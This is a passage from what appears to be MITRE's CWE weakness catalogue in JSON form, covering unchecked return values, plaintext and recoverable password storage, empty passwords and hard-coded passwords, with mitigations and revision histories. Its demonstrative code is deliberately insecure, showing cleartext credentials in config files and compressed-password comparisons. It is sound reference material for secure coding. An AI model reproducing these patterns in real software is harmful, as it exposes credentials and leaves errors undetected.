341"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, &#34;Checking Returns&#34; Page 624"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-252-data"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-252-resource"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-252-resource"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example and suggested CERT reference"}}},"253":{"attr":{"@_ID":"253","@_Name":"Incorrect Check of Function Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software incorrectly checks a return value from a function, which prevents the software from detecting errors or exceptional conditions.","Extended_Description":"Important and common functions will return some value about the success of its actions. This will alert the program whether or not to handle any errors caused by that function.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart"],"Note":"An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language or compiler that uses exceptions and requires the catching of those exceptions."},{"Phase":"Implementation","Description":"Properly check all functions which return a value."},{"Phase":"Implementation","Description":"When designing any function make sure you return a value or throw an exception in case of an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to allocate memory for 4 integers and checks if the allocation succeeds.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"tmp = malloc(sizeof(int) * 4);if (tmp &lt; 0 ) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Failure\\");","xhtml:br":["",""],"xhtml:i":"//should have checked if the call returned 0"}}}},"Body_Text":"The code assumes that only a negative return value would indicate an error, but malloc() may return a null pointer when there is an error. The value of tmp could then be equal to 0, and the error would be missed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Misinterpreted function return value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Return Value Testing and Interpretation&#34;, Page 340"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Misinterpreted Function Return Value","attr":{"@_Date":"2009-03-10"}}}},"256":{"attr":{"@_ID":"256","@_Name":"Plaintext Storage of a Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Storing a password in plaintext may result in a system compromise.","Extended_Description":"Password management issues occur when a password is stored in plaintext in an application\'s properties, configuration file, or memory. Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource. In some contexts, even storage of a plaintext password in memory is considered a security risk if the password is not cleared immediately after it is used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Architecture and Design","Note":"Developers sometimes believe that they cannot defend the application from someone who has access to the configuration, but this belief makes an attacker\'s job easier."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid storing passwords in easily accessible locations."},{"Phase":"Architecture and Design","Description":"Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext."},{"Description":"A programmer might attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password because the encoding can be detected and decoded easily.","Effectiveness":"None"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-57"},"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = prop.getProperty(\\"password\\");DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-58"},"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);...","xhtml:br":["","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system"},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage","attr":{"@_Date":"2008-01-30"}},{"#text":"Plaintext Storage of a Password","attr":{"@_Date":"2018-01-23"}},{"#text":"Plaintext Storage of a Password","attr":{"@_Date":"2018-03-27"}},{"#text":"Unprotected Storage of Credentials","attr":{"@_Date":"2021-07-20"}}]}},"257":{"attr":{"@_ID":"257","@_Name":"Storing Passwords in a Recoverable Format","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"259","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control"],"Impact":"Gain Privileges or Assume Identity","Note":"User\'s passwords may be revealed."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Revealed passwords may be reused elsewhere to impersonate the users in question."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use strong, non-reversible encryption to protect stored passwords."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-59"},"Intro_Text":"Both of these examples verify a password by comparing it to a stored compressed version.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"#text":"if (strcmp(compress(password), compressed_password)) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (passwd.Equals(compress(password), compressed_password)) {}return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""],"xhtml:i":"//Diagnostic Mode"}}}],"Body_Text":"Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Storing passwords in a recoverable format"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"49"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"The meaning of this entry needs to be investigated more closely, especially with respect to what is meant by \\"recoverable.\\"","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}]}},"258":{"attr":{"@_ID":"258","@_Name":"Empty Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Using an empty string as a password is insecure.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"521","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, names book, on a map, etc. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing letters in that word with numbers and punctuation. However, do not use \\"similar-looking\\" punctuation. For example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string.","Body_Text":["This Java example shows a properties file with an empty password string.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string.","An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;&lt;/connectionStrings&gt;...","xhtml:br":["","","",""]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Empty Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"259":{"attr":{"@_ID":"259","@_Name":"Use of Hard-coded Password","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.","Extended_Description":{"xhtml:p":["A hard-coded password typically leads to a significant authentication failure that can be difficult for the system administrator to detect. Once detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations:","In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place.","The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Inbound: the software contains an authentication mechanism that checks for a hard-coded password.","Outbound: the software connects to another system or component, and it contains hard-coded password for connecting to that component."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"321","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"257","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If hard-coded passwords are used, it is almost certain that malicious users will gain access through the account in question."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11.6"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss 